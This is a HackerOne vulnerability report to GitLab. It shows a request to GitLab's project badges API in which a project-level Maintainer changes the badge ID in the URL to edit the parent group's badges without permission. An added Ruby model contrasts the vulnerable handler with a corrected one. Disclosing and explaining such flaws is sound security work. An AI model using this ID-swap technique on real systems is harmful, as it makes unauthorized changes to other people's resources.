Project Maintainer can EDIT group badges

HackerOne report #751264 by ashish_r_padelkar on 2019-12-04, assigned to @ankelly:

Summary

Hello,

When a user has explicit Maintainer permission on a project but not at group level, such users can still EDIT group level badges.

Steps to reproduce

  1. Add a user at project level as maintainer but don't give any access at group level.
  2. Now log in as the above user with the maintainer role in the project.
  3. Go to https://gitlab.com/<GroupName>/<ProjectName>/edit and EDIT any of your project level badges. You won't see an EDIT button next to group badges as you don't have any permissions to EDIT them.
  4. When you EDIT and save a project badge, you will see the request below:
```http
PUT /api/v4/projects/15203433/badges/<Badge_ID> HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 149
Accept: application/json, text/plain, */*
Origin: https://gitlab.com
X-CSRF-Token: ████
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://gitlab.com/groupfor1/1projectfor/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: ████

{"name":"CCC","image_url":"https://gitlab.com/%{project_path}/badges/%{default_branch}/pipeline.svg","link_url":"https://gitlab.com/%{project_path}"}
```
  5. Just change the <Badge_ID> in the URL to the ID of a group badge and send the request PUT /api/v4/projects/15203433/badges/<Badge_ID> HTTP/1.1
  6. This will successfully change the group level badge!

What is the current bug behavior?

Project Maintainer can change group badges without any access to the group.

What is the expected correct behavior?

Project Maintainer shouldn't be allowed to change group level badges.

Output of checks

This bug happens on GitLab.com. Tested on a public group with a private project, but it should work for a private group with private projects too.

Regards,
Ashish

Impact

Project Maintainers can change group level badges
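The flaw the report describes is an authorization check done against the wrong object: the PUT handler verifies that the caller may administer the *project*, then resolves the badge ID from the list of badges the project *displays*, which legitimately includes badges inherited from the parent group. Below is an added, simplified model of that handler next to a corrected one. It is illustration code, not GitLab's own implementation; the `Badge`/`Project`/`User` structs, the role hashes, and the badge and group IDs are assumptions made for the example (the project ID is taken from the report's request).

```ruby
# Added, simplified model of the flaw in the report.  NOT GitLab's code:
# the structs, role hashes and the badge/group ids are assumptions.
Badge   = Struct.new(:id, :name, :owner_type, :owner_id, keyword_init: true)
Project = Struct.new(:id, :group_id, keyword_init: true)
User    = Struct.new(:project_roles, :group_roles, keyword_init: true)

# Constructed sample data: one badge owned by the project and one owned by
# its parent group.  Returned fresh so each caller mutates its own copy.
def sample_badges
  [
    Badge.new(id: 1, name: "pipeline", owner_type: :project, owner_id: 15203433),
    Badge.new(id: 2, name: "coverage", owner_type: :group,   owner_id: 100),
  ]
end

def sample_project
  Project.new(id: 15203433, group_id: 100)
end

# The report's setup: Maintainer on the project, no membership in the group.
def project_only_maintainer
  User.new(project_roles: { 15203433 => :maintainer }, group_roles: {})
end

def can_admin_project?(user, project)
  user.project_roles[project.id] == :maintainer
end

# A project's badge listing legitimately includes inherited group badges;
# this is what the project edit page renders (without an Edit button for
# the group-owned ones).
def badges_visible_to(badges, project)
  badges.select do |b|
    (b.owner_type == :project && b.owner_id == project.id) ||
      (b.owner_type == :group && b.owner_id == project.group_id)
  end
end

# Vulnerable handler for PUT /projects/:id/badges/:badge_id: the permission
# check is against the project, but the badge is resolved from the inherited
# listing, so swapping in a group badge id silently succeeds.
def update_badge_vulnerable(user, project, badges, badge_id, new_name)
  return :forbidden unless can_admin_project?(user, project)

  badge = badges_visible_to(badges, project).find { |b| b.id == badge_id }
  return :not_found unless badge

  badge.name = new_name
  :ok
end

# Fixed handler: a write through the project endpoint may only target badges
# the project itself owns.  Group badges stay readable via the listing, but a
# group badge id is not a valid write target here, so the request 404s.
def update_badge_fixed(user, project, badges, badge_id, new_name)
  return :forbidden unless can_admin_project?(user, project)

  badge = badges.find do |b|
    b.id == badge_id && b.owner_type == :project && b.owner_id == project.id
  end
  return :not_found unless badge

  badge.name = new_name
  :ok
end

if __FILE__ == $PROGRAM_NAME
  user, project = project_only_maintainer, sample_project
  puts "vulnerable: #{update_badge_vulnerable(user, project, sample_badges, 2, 'CCC')}" # :ok
  puts "fixed:      #{update_badge_fixed(user, project, sample_badges, 2, 'CCC')}"      # :not_found
end
```

The general lesson is that the object an authorization decision is made about must be the same object the write is applied to. Resolving the target from a broader, read-oriented collection (here, "badges shown on this project") and then authorizing against the narrower scope the caller chose in the URL is what lets the ID swap through; the fix scopes the lookup for writes to objects the authorized scope actually owns.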